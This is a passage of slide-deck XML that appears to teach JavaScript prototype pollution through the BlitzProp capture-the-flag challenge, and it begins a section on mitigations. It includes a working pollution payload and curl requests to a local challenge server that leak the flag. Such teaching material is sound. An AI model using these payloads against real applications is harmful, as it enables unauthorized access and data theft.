              <a:t>BlitzProp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2200" dirty="0"/>
              <a:t> 3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="2200"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Payload:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pP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"song"</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"FIRE BIRD"</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.__proto__.block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: {</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"type"</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"Text"</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"line"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"({}).__proto__[`FIRE BIRD`] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>globalThis.flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="657B83"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Terminal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pP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"http://localhost/song"</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--data-raw </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'{"song": "FIRE BIRD", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.__proto__.block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>": {"type": "Text", "line": "({}).__proto__[`FIRE BIRD`] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>globalThis.flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"}}’</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&lt;span&gt;by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Roseliandefine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/span&gt;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 curl -X POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"http://localhost/song"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -H </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Content-Type: application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json</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--data-raw </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'{"song": "FIRE BIRD"}’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&lt;span&gt;by flag{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>you_should_know_this_song_or_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_...}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ndefine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/span&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28863442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45B1E-D5E9-C896-DA04-0E8CAE9996A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2200" dirty="0"/>
              <a:t>Finding gadgets: Cyber Apocalypse 2021/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2200" dirty="0" err="1"/>
              <a:t>BlitzProp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2200" dirty="0"/>
              <a:t> 4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E168D471-78E0-168E-D184-1E9512A6885A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Further techniques demonstrated in the modified version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>There is nothing wrong with performing the same technique twice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>As prototype pollution is persistent, there is no need force yourself to think of a solution that takes one request only to get the flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Do take note whether the challenge server restarts itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>This also applies for any other technique that is persistent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19CD0BFF-A58F-FDDE-01D7-E10B590AAB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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2031211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193EB-4FBA-4EC1-2331-733735A0BA2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Finding gadgets 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58848E14-C266-F092-E655-8D71FCD9B2D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>This is a taste of how other techniques can be combined with prototype pollution to get the flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>A good place to find further examples and writeups involving prototype pollution is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>CTFtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://ctftime.org/writeups?hidden-tags=prototype-pollution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>This is also where we get our prototype modification examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>But just as there are gadgets, there are also anti-gadgets… (attack mitigations)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFA2462D-ECAF-0FEB-2415-9DAC74E04F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4781997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24F5-AA4B-A830-BAB6-CCA250707942}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Mitigations/obstacles</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>(how to jail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>hackercat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A5FC774-8DF4-66AC-344F-64F1CE3755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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7E94197-1FEF-6BC9-CEF7-E9419CBD6CEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1095236" y="2841050"/>
            <a:ext cx="3998803" cy="2068776"/>
            <a:chOff x="1049894" y="3010489"/>
            <a:chExt cx="3998803" cy="2068776"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7" descr="A yellow cat with a sign&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE5691B7-C409-36A5-0224-172D9ED74312}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3422727" y="3231892"/>
              <a:ext cx="1625970" cy="1625970"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="Group 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDE5214A-E9D8-460F-32FC-FAFE1B6A6232}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1049894" y="3010489"/>
              <a:ext cx="2068776" cy="2068776"/>
              <a:chOff x="619144" y="3074724"/>
              <a:chExt cx="2068776" cy="2068776"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="10" name="Picture 9" descr="A cartoon of a cat crying&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09FB3479-4738-F302-C99B-E51D546FC570}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="862367" y="3443509"/>
                <a:ext cx="1582330" cy="1452631"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="Picture 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DD7B1EA-97BD-5250-73E6-8E9F531B08B6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="619144" y="3074724"/>
                <a:ext cx="2068776" cy="2068776"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19007540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B473918-58A4-0F98-8605-3BBE9758FBF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The duality of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" strike="sngStrike" dirty="0"/>
              <a:t>human</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>blobcat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60E2F5A4-045F-17F8-5ABD-57ECB3345E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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E682DF61-2279-AF20-98EA-8BAE30437BCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2745156" y="158697"/>
            <a:ext cx="3653687" cy="4092129"/>
            <a:chOff x="2745156" y="158697"/>
            <a:chExt cx="3653687" cy="4092129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A99D4A5B-7153-7088-C159-90A849500948}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2745156" y="158697"/>
              <a:ext cx="3653687" cy="4092129"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{479AB107-E811-DF38-F669-661975C9EF5A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4413502" y="2041241"/>
              <a:ext cx="1385830" cy="1374534"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="695922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dirty="0"/>
              <a:t>Why mitigate and how?</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dirty="0"/>
              <a:t>For real word applications: Prevent or reduce losses from attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Monetary loss</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Reputational loss</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Personal loss</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Avoid getting blamed and fired</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
